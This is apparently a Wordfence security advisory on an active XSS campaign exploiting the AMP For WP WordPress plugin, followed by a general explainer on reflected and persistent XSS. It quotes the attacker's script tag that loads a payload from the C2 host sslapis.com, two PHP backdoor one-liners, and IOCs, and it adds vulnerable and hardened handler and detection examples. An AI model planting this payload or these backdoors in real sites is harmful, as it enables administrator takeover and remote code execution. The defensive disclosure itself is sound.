This entry was posted in Research, Vulnerabilities, WordPress Security on November 20, 2018 by Mikey Veenstra
News broke last week disclosing a number of vulnerabilities in the AMP For WP plugin, installed on over 100,000 WordPress sites. WordPress contributor Sybre Waaijer identified the security issue and confidentially disclosed it to the WordPress plugins team. To exploit the flaw, an attacker needs to have a minimum of subscriber-level access on a vulnerable site.
The Wordfence team has identified an XSS (cross-site scripting) campaign that is actively exploiting this security flaw. In the post below, we describe this sophisticated attack campaign in detail. It is critical that site owners using AMP For WP update to the most recent version of this plugin as soon as possible. At the time of writing, the newest version of AMP For WP is version 0.9.97.20.
The Wordfence firewall has a new rule that defends sites against this exploit. This rule has been released to Premium Wordfence customers and will be available for free customers 30 days after release. In addition, the Wordfence firewall has a generic XSS rule which has been available to free and Premium customers for over 2.5 years, which catches most exploits targeting this vulnerability.
In addition, the Wordfence team released malware signatures into production that detect the malware payloads that are being deposited on servers targeted in this attack. These are currently in production for Wordfence Premium customers.
The rest of this post documents the attack campaign our team has identified, which exploits the recently disclosed vulnerability in the AMP For WP plugin. It is written for security operations teams, developers, vendors and other network defenders: it describes the attack chain and includes IOCs (indicators of compromise) that can be used to improve security products and harden firewalls and intrusion detection systems against this threat.
A number of individual security flaws were patched in the recent release of the plugin. The crux of the situation is an overall lack of capabilities checks on the plugin’s AJAX hooks: a user needs an active login session to make the necessary calls to the plugin, but it does not matter which permissions that user has been granted on the impacted site.
The code above, from install/index.php, iterates over POST data without any capabilities checks. The active exploits we have identified are leveraging this set of flaws to modify the plugin’s own options stored in the WordPress database.
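The handler shape the write-up describes, next to a hardened version, as an added example; this is not the plugin’s code, and the hook, option and nonce names are hypothetical.

```php
<?php
// Added example, not the plugin's code: the handler shape described in the
// write-up (hook, option and nonce names are hypothetical), then a hardened one.

// Vulnerable shape: wp_ajax_ hooks run for any logged-in user, whatever the role,
// and every POST key is written straight into wp_options, so a subscriber can
// store a <script> tag in an option that is later printed into admin pages.
add_action('wp_ajax_example_amp_save', 'example_amp_save_unsafe');
function example_amp_save_unsafe() {
    foreach ($_POST as $key => $value) {
        update_option($key, $value); // no capability check, no nonce, no allowlist
    }
    wp_die();
}

// Hardened: require a capability only administrators hold, verify the nonce so
// the request came from the plugin's own form, accept only known option names,
// and strip tags from the value before it is stored.
add_action('wp_ajax_example_amp_save_secure', 'example_amp_save_secure');
function example_amp_save_secure() {
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient permissions', 403); // sends and exits
    }
    check_ajax_referer('example_amp_save', 'nonce'); // dies with -1 on failure

    $allowed = ['example_amp_footer_text', 'example_amp_analytics_id'];
    foreach ($allowed as $name) {
        if (isset($_POST[$name])) {
            update_option($name, sanitize_text_field(wp_unslash($_POST[$name])));
        }
    }
    wp_send_json_success();
}
```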
The most prevalent attacks against this vector attempt to inject the following XSS payload into the victim’s site content with the goal of affecting a logged-in administrator:
<script src=https://sslapis.com/assets/si/stat.js></script>
If an administrator’s browser executes the malicious JavaScript, it will source a larger payload from its command and control (C2) server at sslapis.com. This script, stat.js, contains a number of notable features.
The SendData() function above notifies the C2 server of any actions successfully executed by the malicious JavaScript. One area of concern is the processNewUser() function, which attempts to hijack the affected administrator’s browser session in order to register a new administrator account named supportuuser:
The processNewUser() function attempts to use a hidden iframe to execute the user registration process. After creating a hidden iframe element on the page being viewed by the affected administrator, the script simulates the process of filling out the New User form. As part of this process it selects the Administrator role and sends a click() event to the submit button to create a new user with admin access.
In addition to the creation of a rogue administrator account, the script also attempts to inject backdoor code into an affected site’s plugins. This is accomplished similarly to the administrator creation above, with a hidden iframe appended to the page’s content and used to simulate an admin’s interactions with the Plugin areas of the dashboard.
The function defined above is used to inject malicious PHP into a site’s plugins.
The PHP backdoors injected into a site’s plugins are as follows:
@array_diff_ukey(@array((string)@$_REQUEST['vqmode']=>1), @array((string)stripslashes(@$_REQUEST['map'])=>2),@$_REQUEST['bootup']);
@extract($_REQUEST);@die($cdate($adate));
Both of these backdoors are effective ways to allow an attacker to execute arbitrary PHP code on infected sites, even if the rogue administrator account mentioned above is successfully removed.
The command and control (C2) server for this campaign is currently located at
sslapis.com
. This host serves the live version of the JavaScript payload described above, as well as a script used to receive data from affected browser sessions. The domain itself was registered on November 2nd with the Ukrainian company ukrnames.com, but the server hosting the domain has been around longer, having been associated with an Apple phishing scam just over a year ago. As you may have noticed from the screenshots above, the JavaScript file hosted on the C2 server contains a number of commented-out lines apparently used during development by the malware’s author to test various functions. Additionally, the JavaScript itself is uncommonly well-formatted as compared to other malware, where “uglified” or otherwise obfuscated code is the norm. This can change at any time because the script is hosted on the adversary’s server.
While attacks targeting this vulnerability are coming from an array of source addresses, a flaw in the execution of these attacks makes them easily trackable. It is common for attack platforms to spoof the User-Agent string of a well-known browser in an effort to make their traffic blend in with normal browsing activity. In this case, however, the User-Agent string contained in these malicious requests is broken:
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv
Note that in similar User-Agent strings, a version number follows “rv”. This suggests that the attacker intended to rotate or otherwise change the version number in the string programmatically. This broken User-Agent was found in all attacks associated with this adversary.
Most Prevalent Attacking IPs
Outbound Domains Accessed
- sslapis.com
Associated User-Agents
- Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv
Database Indicators
- The presence of unauthorized accounts in your site’s users table, including but not limited to the following example:
  - supportuuser
- The presence of any unintentionally introduced JavaScript in any wp_options entries associated with the AMP For WP plugin, which contain the string amp in the option_name field.
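A scan for the database indicators above and for the two backdoor one-liners quoted earlier, as an added example rather than Wordfence’s tooling; it assumes WordPress is loaded (for instance via wp eval-file) and the administrator allowlist is a constructed placeholder.

```php
<?php
/**
 * Added example, not Wordfence's tooling: checks the database and plugin-file
 * indicators from the write-up with WordPress loaded (e.g. `wp eval-file amp-ioc-scan.php`).
 * The option search, admin check and backdoor patterns follow the write-up; the
 * allowlist contents are constructed for the demonstration.
 */
function example_amp_ioc_scan(array $expected_admins): array {
    global $wpdb;
    $findings = [];

    // Indicator 1: script content in any option whose name contains "amp".
    // The raw column is searched, so serialized arrays are covered as well.
    $rows = $wpdb->get_results($wpdb->prepare(
        "SELECT option_name, option_value FROM {$wpdb->options} WHERE option_name LIKE %s",
        '%' . $wpdb->esc_like('amp') . '%'
    ));
    foreach ($rows as $row) {
        if (preg_match('/<script\b|javascript:/i', $row->option_value)) {
            $findings[] = "script-like content in option {$row->option_name}";
        }
    }

    // Indicator 2: administrator accounts outside the allowlist
    // (the campaign registers one named supportuuser).
    foreach (get_users(['role' => 'administrator', 'fields' => ['user_login']]) as $user) {
        if (!in_array($user->user_login, $expected_admins, true)) {
            $findings[] = "unexpected administrator account {$user->user_login}";
        }
    }

    // Indicator 3: the two backdoor one-liners quoted above, anywhere under the
    // plugins directory. Both let request parameters choose the function that runs.
    $backdoor = '/extract\s*\(\s*\$_REQUEST\s*\)|array_diff_ukey\s*\([^;]*\$_REQUEST/';
    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(
        WP_PLUGIN_DIR, FilesystemIterator::SKIP_DOTS));
    foreach ($files as $file) {
        if ($file->isFile() && $file->getExtension() === 'php'
            && preg_match($backdoor, (string) file_get_contents($file->getPathname()))) {
            $findings[] = "backdoor pattern in {$file->getPathname()}";
        }
    }
    return $findings;
}

$findings = example_amp_ioc_scan(['siteadmin']); // constructed allowlist
echo $findings ? implode("\n", $findings) . "\n" : "no indicators found\n";
```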
This malware campaign is an example of why a stored XSS vulnerability is a high priority issue. When an attacker is able to run their own JavaScript in the browser of a site’s administrator, there are a variety of techniques they can employ to pivot further into a site. While the C2 domain in the case of this attack is very new and has yet to appear on the blacklists used by popular browser plugins like uBlock Origin, administrators of mission-critical sites might consider employing an untrusted-by-default model with browser extensions like NoScript.
We considered a content security policy (CSP) as possible mitigation of this attack, but the attacker could modify the XSS payload to be an inline version of the script loaded from the sslapis C2 server.
As always, the best defense against these attacks is to keep your site’s software up to date. AMP For WP’s security fix was available for nearly two weeks before these attacks began, hopefully placing a hard limit on the exploitable attack surface of this vulnerability.
For sites unable to update, or those which have not updated for any other reason, a rule has been added to the Wordfence firewall preventing these attacks. This rule is already in place for all Premium Wordfence users and will be released to Free Wordfence users after 30 days. However, most attempts at exploiting this vulnerability happen to trigger a preexisting firewall rule built to block generic XSS payloads, and this rule has been protecting free Wordfence users for over 2.5 years. Our team has also released malware signatures into production to detect the malware being deposited on servers targeted in this attack.
Written by Mikey Veenstra with research assistance from Stephen Rees-Carter, James Yokobosky and Matt Barry.
Worried about distributed denial-of-service and SQL injection attacks on your website? You should be. But don't stop there, because chances are you're overlooking what is potentially the most prevalent website attack today: Namely, cross-site scripting (XSS). In one recent study, 75 percent of U.S. government websites were found to be vulnerable to XSS attack.
XSS attacks exploit the relationship between the user and the web site he or she is accessing. When you visit a web site, there is a presumption that the data transferred between your browser client and the web server is visible only to the owner of the web site and its authorized partners. But when an XSS attack muscles its way into this relationship, it can expose data to a malicious third-party – without the knowledge of either the end-user or web site owner.
The same-origin policy
One method used to enforce trust in web applications is to limit code to interacting with data from the same origin server. For example, suppose that a web site owned by bigcorp.com includes two external Javascript files, one hosted at bigcorp.com and the other at noodlecorp.com.
The code downloaded from bigcorp.com can access document elements on the page generated from bigcorp.com; for example, this may include fields with a username or password, or information such as a user's account balance. This code can also call on code from any other scripts downloaded from bigcorp.com, such as methods or functions.
But the code downloaded from noodlecorp.com is typically prohibited from accessing these elements. This 'same-origin policy' protects the user because we don't know if the code from noodlecorp.com can be trusted.
In practice, the same-origin policy is not equally implemented in all web browsers, and even web pages can explicitly expand the range of origin domains allowed to share data. The goal of an attacker is to slip code into the browser under the guise of conforming to the same-origin policy.
To achieve this, XSS attacks typically fall into two strategies: reflected attacks and persistent attacks.
Reflected XSS
In a reflected cross-site scripting attack, the user unwittingly sends code to a web server which then 'reflects' that code back to the user's browser, where it is executed and performs a malicious act.
For example, consider a web site that accepts user input in the form of a search request. Suppose that the web application returns the search request with the results (or lack thereof), such as 'Results of your search for XYZ…'
Now suppose that the code which processes user input (either on the client side or server side) does not adequately sanitize the input. A hacker could craft user input which actually contains client-side code such as Javascript.
When the web application reflects the user input as output to the browser, it passes the same-origin policy test. This code could be rigged to retrieve sensitive information from the end-user and deliver it to a server controlled by the attacker.
In a typical reflected XSS attack, the malicious code will be baked into a hyperlink that is presented to the end-user. This link might be delivered via a phishing e-mail, for example, in the hopes of baiting the user into clicking it and triggering the attack sequence.
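The search page described above, once with the query echoed raw (the reflected case) and once encoded for the HTML context at the point of output, as an added example that is not from the article; the inputs are constructed stand-ins for a crafted link.

```php
<?php
// Added example, not from the article: a search-results page that echoes the
// query both in the heading and back into the search box, first raw and then
// encoded for HTML. Inputs are constructed stand-ins for a crafted ?q= link.

function render_results_unsafe(string $q, int $count): string {
    // The query lands inside an element body and an attribute value untouched.
    return "<h2>Results of your search for {$q}</h2>\n"
         . "<input name=\"q\" value=\"{$q}\"> {$count} results";
}

function render_results_safe(string $q, int $count): string {
    // ENT_QUOTES encodes both quote styles, so the value cannot close the
    // attribute; ENT_SUBSTITUTE avoids returning '' on invalid UTF-8.
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<h2>Results of your search for {$safe}</h2>\n"
         . "<input name=\"q\" value=\"{$safe}\"> {$count} results";
}

// Element-body variant, then an attribute-breakout variant of the same idea.
$inputs = [
    '<script>alert(1)</script>',
    '"><script>alert(1)</script>',
];
foreach ($inputs as $q) {
    echo "unsafe:\n", render_results_unsafe($q, 0), "\n";
    echo "safe:\n",   render_results_safe($q, 0), "\n\n";
}
```

The unsafe output keeps the tags intact (and the second input closes the value attribute early), while the safe output renders them as literal text.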
Persistent XSS
The scale of a reflected XSS attack is limited by how many users can be tricked into launching the malicious code. An attacker who wants to exploit XSS on a large scale will prefer to employ a persistent XSS attack.
The basic mechanism in a persistent XSS attack is the same – to embed malicious code into a web page delivered by the server, so that it satisfies the same-origin policy. But in this strategy, the attacker plants this code into a web page that every visitor will see.
Consider a web-based discussion board. The messages posted to a discussion board are seen by everyone who visits that page, but the content is submitted by a user. If the attacker can plant malicious code into a message they post themselves, most visitors to that page will wind up unwittingly executing the code.
Once again, the fundamental vector being exploited is inadequate sanitizing of user input. Message board posts – or any web site that displays user submissions – necessarily display content posted by unknown parties. If this content is not thoroughly scrubbed of potentially malicious code, a persistent XSS attack can easily be planted on the site.
Consequences of an attack
XSS code can be crafted to lift a variety of sensitive data including any information presented on the same page where the cross-site code was planted. But the most dangerous risk is the theft of user authentication credentials.
Many sites save authentication or session credentials in a browser cookie. Malicious code can lift this cookie and send it to a server controlled by the attacker. With that cookie in hand, the attacker might be able to access the same web site masquerading as the victim user, bypassing any login.
Even if the compromised site does not provide access to highly sensitive content like e-mail or finances, a hacker might be able to access personal details that can be leveraged against a more sensitive site such as the user's webmail account.
Malicious code can also be designed to alter the content on the page presented to the site visitor. One nasty trick would be to change the destination of a link on the page (or present a new link that the visitor is urgently told to click), baiting them into visiting a malicious site fully engineered by the attacker to launch a more serious attack.
Alternatively, an attacker might use an XSS attack against the site owner rather than the site visitor. The same trick of altering output can be used to vandalize content – imagine a news site where the XSS attack defaces headlines and undermines the credibility of the site.
Defending against XSS
Ultimately, XSS is a type of code injection very similar in nature to SQL injection. Like protecting against any code injection attack, the best defense is thorough and well-tested sanitization of any and all user input.
Site owners need to determine every input path by which their web site accepts incoming data. Each path must be hardened against malicious data that can represent executable code. Often this requires implementing multiple filters along the communication pathway – for example, a web application firewall such as ModSecurity plus input sanitization within server-side input processing code.
Developers should also use tools such as XSS Me for Firefox or domsnitch for Google Chrome to test their own sites for XSS vulnerabilities.
As a secondary defense, a site could link browser cookie credentials to the user's IP address. While not a perfect defense, this would prevent easy abuse of users' cookies. An attacker could engineer a system to lift the user's IP address and spoof their own actions under that address but this degree of attack will be far less widespread than simple cookie theft.
Aaron Weiss is a technology writer and frequent contributor to eSecurity Planet and Wi-Fi Planet.